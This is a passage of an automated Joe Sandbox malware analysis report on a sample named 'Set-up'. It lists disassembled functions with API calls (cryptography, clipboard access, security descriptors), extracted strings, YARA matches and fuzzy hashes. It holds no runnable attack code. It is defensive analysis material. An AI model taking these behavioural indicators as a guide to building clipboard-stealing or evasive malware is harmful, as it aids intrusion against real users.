                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: S$_$f$z$|
                                                                                                                                  • API String ID: 0-1364545660
                                                                                                                                  • Opcode ID: 2f652a6f6a6bc7fed3cf7dd40d6742ea5a3b9819983657587b68657c4ccf7003
                                                                                                                                  • Instruction ID: c1b60bb1e29d667527b2be58bb673336ae26c6a6ff42cad642e9ea07de146830
                                                                                                                                  • Opcode Fuzzy Hash: 2f652a6f6a6bc7fed3cf7dd40d6742ea5a3b9819983657587b68657c4ccf7003
                                                                                                                                  • Instruction Fuzzy Hash: 49F1B672A0D7508BC724DB7C84883AEBBE2AB99224F194A3DDDD9C73D1D6748C418783
                                                                                                                                  Function 00E45980 Relevance: 10.6, APIs: 7, Instructions: 64encryptionthreadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • InterlockedExchange.KERNEL32(0131ADF8,00000001), ref: 00E459BE
                                                                                                                                  • SwitchToThread.KERNEL32(?,?,?,01163D80,000000FF,?,00E46444,460C02D8), ref: 00E459C8
                                                                                                                                  • InterlockedExchange.KERNEL32(0131ADF8,00000001), ref: 00E459D5
                                                                                                                                  • InterlockedExchangeAdd.KERNEL32(0131ADF4,00000000), ref: 00E459ED
                                                                                                                                  • CryptAcquireContextA.ADVAPI32(0131ADF0,00000000,00000000,00000001,F0000000), ref: 00E45A05
                                                                                                                                  • InterlockedIncrement.KERNEL32(0131ADF4), ref: 00E45A14
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E45A1C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Interlocked$Exchange$AcquireContextCryptErrorIncrementLastSwitchThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2311981888-0
                                                                                                                                  • Opcode ID: 2da2f652c945f70f87fcdae06099d44b573f76456e26e2377b91c26743afaae0
                                                                                                                                  • Instruction ID: 7c296216fd7df3daf1f0e7fd8a2616cc0aaff30e7f80ebf05342e8496408f5ed
                                                                                                                                  • Opcode Fuzzy Hash: 2da2f652c945f70f87fcdae06099d44b573f76456e26e2377b91c26743afaae0
                                                                                                                                  • Instruction Fuzzy Hash: EB113432385745AFDB389FA5EC96BAA7BB8EB00B15F00026DF521E3285D7706484C725
                                                                                                                                  Function 05472C5C Relevance: 9.2, Strings: 7, Instructions: 457COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5470000_Set-up.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: -$.$A$gfff$gfff$gfff$gfff
                                                                                                                                  • API String ID: 0-3814466830
                                                                                                                                  • Opcode ID: f4961ff8a02584759a9619b723c8481bf4e97fcdf5aa60f21e551e1eb24d1177
                                                                                                                                  • Instruction ID: d21c2d5a45f0c32ee5f7ecf74979be279ac5114c649ebbe1b6e9591ffa5df0ae
                                                                                                                                  • Opcode Fuzzy Hash: f4961ff8a02584759a9619b723c8481bf4e97fcdf5aa60f21e551e1eb24d1177
                                                                                                                                  • Instruction Fuzzy Hash: 46F1B27160D7858FC718CE29C4906EBBBE2BFC9300F088A6EE99987391D775D905DB42
                                                                                                                                  Function 05911C40 Relevance: 9.2, APIs: 6, Instructions: 168clipboardCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Clipboard$CloseDataLongOpenWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1647500905-0
                                                                                                                                  • Opcode ID: fcff533c875ad6d8bde2d63c3cef850d051e4cf56d106a6a54a4867c64365ddf
                                                                                                                                  • Instruction ID: 4b144311540e555cb8a956d82c5b075f2c76cead3343e07b64f41b446a3dd867
                                                                                                                                  • Opcode Fuzzy Hash: fcff533c875ad6d8bde2d63c3cef850d051e4cf56d106a6a54a4867c64365ddf
                                                                                                                                  • Instruction Fuzzy Hash: 135126B2A08755DFD700EBBCD84939EBFE1AB55200F048538D998DB382E378D914CB96
                                                                                                                                  Function 058EF120 Relevance: 9.1, Strings: 7, Instructions: 393COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: <0<>$cf0?$f|nf$zhcz$~5g$QW$U7[
                                                                                                                                  • API String ID: 0-3684071681
                                                                                                                                  • Opcode ID: ab9868a001b5592597039ded65ae479b8ce40629b2d5a65dad021cd865f52924
                                                                                                                                  • Instruction ID: f730b9606b8f75d51726a286f40d55d5f2ca58e5a9d05f6402a8a6b9edbb6b8a
                                                                                                                                  • Opcode Fuzzy Hash: ab9868a001b5592597039ded65ae479b8ce40629b2d5a65dad021cd865f52924
                                                                                                                                  • Instruction Fuzzy Hash: BCC1157160C3859BD314CF29C49136FBBE2AFD2248F18886CE9D69B345D775C94ACB82
                                                                                                                                  Function 058E1319 Relevance: 9.1, Strings: 7, Instructions: 359COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: -$.$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff$gfff
                                                                                                                                  • API String ID: 0-1174649707
                                                                                                                                  • Opcode ID: c362ef20c276e6fcd28eaf5be008f6dd9a57829d617c97d9d97c4c13b772dc45
                                                                                                                                  • Instruction ID: 5c51938b3c7ee3943d1de590ed6595e54822aa6e8243079108b2903b165d6743
                                                                                                                                  • Opcode Fuzzy Hash: c362ef20c276e6fcd28eaf5be008f6dd9a57829d617c97d9d97c4c13b772dc45
                                                                                                                                  • Instruction Fuzzy Hash: 6DD1AF7560D3818FC719CE29C48066AFBF2ABDA304F088A6DE8DAC7356D674D905CB52
                                                                                                                                  Function 058E156D Relevance: 9.1, Strings: 7, Instructions: 357COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: +$.$A$gfff$gfff$gfff$gfff
                                                                                                                                  • API String ID: 0-2290567592
                                                                                                                                  • Opcode ID: 8e77ca7388db3fda6d77f0150d27ee7a11390d7dc3264986fe778acfb6154491
                                                                                                                                  • Instruction ID: c463ce54b10d9f013af2188451af9eaa5cd4ababd8c5c407bcafcdbbdba13471
                                                                                                                                  • Opcode Fuzzy Hash: 8e77ca7388db3fda6d77f0150d27ee7a11390d7dc3264986fe778acfb6154491
                                                                                                                                  • Instruction Fuzzy Hash: E2C1C275A0C7418FC318CE2DC89066ABBE6BBCA304F088A3DE99AD7355D675DD05CB42
                                                                                                                                  Function 05472DE5 Relevance: 9.1, Strings: 7, Instructions: 357COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5470000_Set-up.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: +$.$A$gfff$gfff$gfff$gfff
                                                                                                                                  • API String ID: 0-2290567592
                                                                                                                                  • Opcode ID: 8e77ca7388db3fda6d77f0150d27ee7a11390d7dc3264986fe778acfb6154491
                                                                                                                                  • Instruction ID: 317f3dfdc776b33325700ab74fb873c77316389f5216c1bc0a1cd8c65eb96223
                                                                                                                                  • Opcode Fuzzy Hash: 8e77ca7388db3fda6d77f0150d27ee7a11390d7dc3264986fe778acfb6154491
                                                                                                                                  • Instruction Fuzzy Hash: D1C1D071A0D7458FC718CE2DC4906EBBBE2BBC9300F088A7EE99987385D775D9058B42
                                                                                                                                  Function 00E45B40 Relevance: 9.1, APIs: 6, Instructions: 52encryptionthreadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • InterlockedExchange.KERNEL32(0131ADF8,00000001), ref: 00E45B77
                                                                                                                                  • SwitchToThread.KERNEL32(?,?), ref: 00E45B81
                                                                                                                                  • InterlockedExchange.KERNEL32(0131ADF8,00000001), ref: 00E45B8E
                                                                                                                                  • InterlockedExchangeAdd.KERNEL32(0131ADF4,00000000), ref: 00E45BA6
                                                                                                                                  • InterlockedDecrement.KERNEL32(0131ADF4), ref: 00E45BB5
                                                                                                                                  • CryptReleaseContext.ADVAPI32(00000000,?,?), ref: 00E45BC6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Interlocked$Exchange$ContextCryptDecrementReleaseSwitchThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 229502837-0
                                                                                                                                  • Opcode ID: 6725874bf5aac55bd1d27d95895613f442e89f73b58074b28bd58cf7d33b021a
                                                                                                                                  • Instruction ID: 6b7602eef6874d6514f215c02c6ac9de70f82c203412fa638848c389fe24a974
                                                                                                                                  • Opcode Fuzzy Hash: 6725874bf5aac55bd1d27d95895613f442e89f73b58074b28bd58cf7d33b021a
                                                                                                                                  • Instruction Fuzzy Hash: 3211E172340705ABD7399F65EC96B5A7BA8FB00B16F000128F421E2284D77064808B20
                                                                                                                                  Function 0591A740 Relevance: 9.0, Strings: 7, Instructions: 261COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $INO$0$8<.~$T<.~$re^)$s}~z$ze^)
                                                                                                                                  • API String ID: 0-2811005808
                                                                                                                                  • Opcode ID: 97e3f046d742d5f3d83fcbb33a268169f4d2770ce0df8231e917b6585121f374
                                                                                                                                  • Instruction ID: 40eb5333dd49be6b7c92ce0a945d42a62906e465ed94297f97ae63569a8f59f3
                                                                                                                                  • Opcode Fuzzy Hash: 97e3f046d742d5f3d83fcbb33a268169f4d2770ce0df8231e917b6585121f374
                                                                                                                                  • Instruction Fuzzy Hash: 72918AB5A093149BD714CF14C891B2BBBF6FBC9310F18882DE89687390C735E945CB96
                                                                                                                                  Function 00E4C7F0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 191windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(460C02D8,?,-000000D0,-000000D0), ref: 00E4C82A
                                                                                                                                  • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000800,00000000,00000000,00000000), ref: 00E4C913
                                                                                                                                  • SetLastError.KERNEL32(460C02D8), ref: 00E4CA17
                                                                                                                                  Strings
                                                                                                                                  • !af_ && i<length(), xrefs: 00E4C9F2
                                                                                                                                  • basic_ncstring<wchar_t>::operator [], xrefs: 00E4C9ED
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$FormatMessage
                                                                                                                                  • String ID: !af_ && i<length()$basic_ncstring<wchar_t>::operator []
                                                                                                                                  • API String ID: 71157656-589021327
                                                                                                                                  • Opcode ID: e857b9f68fbe261d8eab9a596fd63a2b8317a711d0ae3202e0731cd4b6454b87
                                                                                                                                  • Instruction ID: ce0c94eae9cf64913bfd67b985dc1fefdc76f09c7a6475b7cf16640b6f495b64
                                                                                                                                  • Opcode Fuzzy Hash: e857b9f68fbe261d8eab9a596fd63a2b8317a711d0ae3202e0731cd4b6454b87
                                                                                                                                  • Instruction Fuzzy Hash: EE513871A42209ABDB68DB64EC457BEB7A4EF88314F349119E912F72C0DB70AC44C795
                                                                                                                                  Function 054A8D08 Relevance: 8.2, Strings: 6, Instructions: 663COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5470000_Set-up.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ,-$47$C$\$m%g+$/)
                                                                                                                                  • API String ID: 0-582880345
                                                                                                                                  • Opcode ID: 57d1e575db662d58e0bd7c5c6dd9e2b79646e402ce1b0d3550dcfe6c3158a993
                                                                                                                                  • Instruction ID: 887e12eb09555ae020b4ec2920f4f2a005747c70f1cfcd031623b63777fb6966
                                                                                                                                  • Opcode Fuzzy Hash: 57d1e575db662d58e0bd7c5c6dd9e2b79646e402ce1b0d3550dcfe6c3158a993
                                                                                                                                  • Instruction Fuzzy Hash: D82231726083019BE718CF24CC85BABBBA6EFD5314F148A2DF5959B3D0D774A905CB82
                                                                                                                                  Function 058E2451 Relevance: 7.8, Strings: 6, Instructions: 302COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: +$A$gfff$gfff$gfff$gfff
                                                                                                                                  • API String ID: 0-3068076857
                                                                                                                                  • Opcode ID: a0f6d55a8ad55c259c2e824b8ed20efe1f4757d572f9fb092c2dccb43a1146ce
                                                                                                                                  • Instruction ID: c17021bbceef7c74c5831f5b2443e522a2158942a9297669807e3f6e16bd7ca6
                                                                                                                                  • Opcode Fuzzy Hash: a0f6d55a8ad55c259c2e824b8ed20efe1f4757d572f9fb092c2dccb43a1146ce
                                                                                                                                  • Instruction Fuzzy Hash: 03B1E2766097418FC318CE2DC89066AFBE6BBCA314F08CA6DE896D7351D674DD05CB82
                                                                                                                                  Function 00E45C00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86encryptionCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • InterlockedExchangeAdd.KERNEL32(0131ADF4,00000000), ref: 00E45C32
                                                                                                                                  • CryptGenRandom.ADVAPI32 ref: 00E45C71
                                                                                                                                  • GetLastError.KERNEL32 ref: 00E45C7B
                                                                                                                                  Strings
                                                                                                                                  • NoCrtRandom::GenRandom: CryptGenRandom() failed: , xrefs: 00E45C93
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CryptErrorExchangeInterlockedLastRandom
                                                                                                                                  • String ID: NoCrtRandom::GenRandom: CryptGenRandom() failed:
                                                                                                                                  • API String ID: 3255506635-416679881
                                                                                                                                  • Opcode ID: 43dfd6802025b9d24f6f77bd6ebc4998e860a06459ca46681867d63ca5fc8ee6
                                                                                                                                  • Instruction ID: 5cee5b1afce37f639e72bc2535c7f59b9bb5f8b2c3715358c866fd94dbd94ed0
                                                                                                                                  • Opcode Fuzzy Hash: 43dfd6802025b9d24f6f77bd6ebc4998e860a06459ca46681867d63ca5fc8ee6
                                                                                                                                  • Instruction Fuzzy Hash: CB210732A04248EFCB18DF64E846BDEBFF8EB95720F00416EF405A7291EB712944C791
                                                                                                                                  Function 00E5A820 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E5A832
                                                                                                                                  • GetLastError.KERNEL32(00000001,?,00000001,?,00000000), ref: 00E5A844
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E5A86F
                                                                                                                                  Strings
                                                                                                                                  • SetSecurityDescriptorDacl(), xrefs: 00E5A852
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DaclDescriptorErrorException@8LastSecurityThrow
                                                                                                                                  • String ID: SetSecurityDescriptorDacl()
                                                                                                                                  • API String ID: 1851696875-1824548980
                                                                                                                                  • Opcode ID: 10f6c1e3e2e51b69eff794aaf272da789d4cb6f5105516f25e92bf38a9b47f70
                                                                                                                                  • Instruction ID: 02a74ac0e57aa4739125e97fbd9cb6ede333ba0f5cb015594d513490babd1c39
                                                                                                                                  • Opcode Fuzzy Hash: 10f6c1e3e2e51b69eff794aaf272da789d4cb6f5105516f25e92bf38a9b47f70
                                                                                                                                  • Instruction Fuzzy Hash: BEE02B3165430877CA28BA749D4BF0A3BAC6B00B15F000928FB10650C0EAB16418C36B
                                                                                                                                  Function 058FFCD0 Relevance: 6.7, Strings: 5, Instructions: 499COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
